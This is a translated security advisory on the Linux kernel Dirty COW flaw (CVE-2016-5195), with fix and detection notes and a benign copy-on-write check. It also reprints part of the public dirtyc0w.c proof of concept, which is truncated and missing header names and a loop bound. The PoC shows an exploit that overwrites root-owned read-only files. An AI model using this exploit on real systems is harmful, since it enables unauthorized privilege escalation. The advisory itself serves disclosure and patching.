CVE-2016-5195 Dirty COW vulnerability: Linux kernel local privilege escalation (vulnerability warning, Black Bar Safety Net / MyHack58)

2016-10-21T00:00:00
ID MYHACK58:62201680403
Type myhack58
Reporter Anonymous (佚名)
Modified 2016-10-21T00:00:00

Description

Vulnerability description

Vulnerability ID: CVE-2016-5195
Vulnerability name: Dirty COW (脏牛)
Hazard: a low-privileged local user can exploit the vulnerability to escalate privileges on every version of Linux that carries it
Affected scope: Linux kernel >= 2.6.22, affected since its release in 2007, until the fix on 18 October 2016
360 Vulpecker Team: tested the vulnerability PoC on Android 7.0 with the latest October security patch level and confirmed that Android is affected

Why is this vulnerability called Dirty COW?

The Linux kernel's memory subsystem has a race condition in the way it handles copy-on-write (COW), and the race can corrupt private read-only memory mappings. A low-privileged local user can exploit it to gain write access to memory mappings that should be read-only, which may lead to further privilege escalation.

Vulnerability details

Vulnerability details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails

According to Red Hat, exploitation of this vulnerability has already been found in the wild, but so far there is no further news.
https://access.redhat.com/security/vulnerabilities/2706661

Commit messages:

commit 4ceb5db9757aaeadcf8fbbf97d76bd42aa4df0d6
Author: Linus Torvalds
Date: Mon Aug 1 11:14:49 2005 -0700

Fix get_user_pages() race for write access

If another thread updates the page table in the meantime, handle_mm_fault() may have to redo the operation, and handle_mm_fault() has no real way to protect the COW break it has already performed. This looks fine, but get_user_pages() re-reads after the fault, so for get_user_pages() to override the write the dirty bit needs to be set; the simplest fix for the race is that if the COW break fails for some reason, we just keep looping and try again.

commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619
Author: Linus Torvalds
Date: Thu Oct 13 20:07:36 2016 GMT

This is an ancient bug. I already tried to fix it once, seven years ago, in commit 4ceb5db9757a, but that was rolled back by commit f33ea7f404e5 because of problems it caused. This time we test the pte_dirty() bit instead.

Linux distribution information for this vulnerability

Red Hat: https://access.redhat.com/security/cve/cve-2016-5195
Debian: https://security-tracker.debian.org/tracker/CVE-2016-5195
Ubuntu: http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html

Affected scope

The vulnerability has existed since kernel 2.6.22, released in 2007, and was fixed on 18 October 2016.

How to fix the vulnerability?

The Linux team is actively working on the fix; update to the latest release to close the vulnerability. Developers can also apply https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 and recompile Linux.

How can I tell whether someone is using the exploit against me?

Exploiting this bug leaves no unusual entries in the logs. Part of the security community has deployed honeypots, which will raise an alarm if an attacker exploits this vulnerability.

Who found this vulnerability?
Phil Oester (https://access.redhat.com/security/cve/CVE-2016-5195)

The vulnerability's author even set up an independent website, Twitter account and GitHub account for it, and looked for someone to design a logo. The author's explanation: building a brand around a vulnerability is fun, but maybe at this point in time it is not a good idea. Still, to make our point, I only created a website, an online shop, a Twitter account, and asked a professional designer to design a LOGO for this vulnerability.

2016.10.21 13:37 update on the vulnerability scope: 360 Vulpecker Team tested the vulnerability PoC on Android 7.0 with the latest October security patch level and confirmed that Android is affected.

2016.10.21 9:10 update, PoC: PoC address: https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c

```c
/*
####################### dirtyc0w.c #######################
$ sudo -s
echo this is not a test > foo
chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/

#include   /* the five header names were lost in extraction */
#include
#include
#include
#include

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
  char *str;
  str = (char *)arg;
  int i, c = 0;
  for (i = 0; i /* loop bound lost in extraction */ )
  {
    /* You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
       > This is achieved by racing the madvise(MADV_DONTNEED) system call
       > while having the page of the executable mmapped in memory. */
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n\n", c);
}

void *procselfmemThread(void *arg)
{
  char *str;
  str = (char *)arg;
  /* You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
     > The in the wild exploit we are aware of doesn't work on Red Hat
```

The listing is cut off here; the original post continues on its second page.
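The copy-on-write guarantee that the race described above breaks, shown as an added example that is not part of the original post or of the dirtyc0w PoC: a write through a MAP_PRIVATE mapping of a file opened read-only must never reach the file on disk. It only illustrates the normal kernel behaviour and does not trigger the race, so it does not tell you whether a kernel is vulnerable; the file path and content are constructed.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Writes through a MAP_PRIVATE mapping of `path` (opened read-only) and
 * reports whether the file on disk still equals `expect`.
 * Returns 1 if the private copy stayed private, 0 if the write reached the
 * file, -1 on error. */
int private_mapping_stays_private(const char *path, const char *expect)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || st.st_size <= 0) { close(fd); return -1; }
    /* PROT_WRITE on a MAP_PRIVATE mapping of a read-only fd is legal: the
     * first write must fault and give this process its own copy of the page. */
    char *map = mmap(NULL, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) { close(fd); return -1; }
    memset(map, 'X', st.st_size);   /* triggers the copy-on-write fault */
    munmap(map, st.st_size);
    char buf[256] = {0};
    ssize_t n = pread(fd, buf, sizeof buf - 1, 0);
    close(fd);
    if (n < 0) return -1;
    return strcmp(buf, expect) == 0;
}

/* Creates a constructed sample file, runs the check and removes the file. */
int run_cow_check(void)
{
    char path[] = "/tmp/cowcheck-XXXXXX";   /* constructed sample file */
    const char *content = "this is not a test";
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    ssize_t len = (ssize_t)strlen(content);
    if (write(fd, content, len) != len) { close(fd); unlink(path); return -1; }
    close(fd);
    int ok = private_mapping_stays_private(path, content);
    unlink(path);
    return ok;
}

int main(void)
{
    int r = run_cow_check();
    printf("private mapping stayed private: %s\n", r == 1 ? "yes" : r == 0 ? "NO" : "error");
    return r == 1 ? 0 : 1;
}
```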
